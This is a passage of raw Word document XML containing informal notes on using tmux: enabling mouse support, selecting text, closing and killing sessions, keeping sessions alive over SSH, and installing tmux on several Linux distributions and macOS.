          <w:numId w:val="182"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mouse not working</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Add </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set -g mouse on</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.tmux.conf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C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1C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C1D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="188038"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">8. Exiting </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="188038"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tmux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C1E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="953"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Close a session</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> All windows and panes in a session must be closed. Use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl+d</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exit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in each.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C1F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kill a session</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tmux kill-session -t my_session</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C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2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3C22">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_emzsl0hboc9s" w:id="551"/>
      <w:bookmarkEnd w:id="551"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to Enable Mouse Support (scrolling through terminal using mouse):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C23">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="985"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nano ~/.tmux.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C24">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="985"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Edit your tmux configuration file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C25">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="985"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set -g mouse on</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C26">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="985"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Add this line</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C27">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="985"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tmux source-file ~/.tmux.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="985"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reload the config file</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C29">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C2A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C2B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C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2D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_68w3foz95hie" w:id="552"/>
      <w:bookmarkEnd w:id="552"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to select text after you Enable Mouse Support</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C2E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C2F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After you enable mouse support, you can't select text like normal. Use this solution:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C30">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C31">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="769"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Disable Mouse Copy Interception Temporaril</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">y: Hold Shift while selecting text with the mouse. This bypasses tmux's mouse interception and allows your terminal emulator to handle the selection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C32">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C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34">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C35">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_882vzccfaj7t" w:id="553"/>
      <w:bookmarkEnd w:id="553"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using tmux with SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C36">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C37">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using SSH with tmux allows you to run commands or manage remote systems persistently. If your SSH connection is interrupted, your tmux session remains active on the remote server, letting you reconnect and resume without losing progress. Here's how it works:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C38">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C39">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="339"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh user@remote-server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="339"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tmux new -s mysession</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="339"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Do this inside the SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C3C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="339"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After SSH connections dies, the tmux session stays alive! Now, all you have to do is ssh back into the server and then attach again: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tmux attach -t mysession</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C3D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="339"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This makes sure everything is saved incase u accidentally break SSH. Everything is saved. It's like you never left!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C3E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="339"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But this requires you to have tmux installed inside the SSH server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C3F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C40">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C41">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9laqjipbum4k" w:id="554"/>
      <w:bookmarkEnd w:id="554"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Installing tmux </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1397"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tmux -V</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C43">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1397"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check to see if tmux is installed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C44">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1397"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For Debian/Ubuntu:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C45">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1397"/>
        </w:numPr>
        <w:ind w:left="144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3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1397"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt install tmux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1397"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For CentOS/RHEL:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C48">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1397"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo yum install tmux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C49">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1397"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For Fedora:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C4A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1397"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo dnf install tmux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1397"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For macOS (if remote server is a Mac):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C4C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1397"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">brew install tmux</w:t>
      </w:r>
    </w:p>
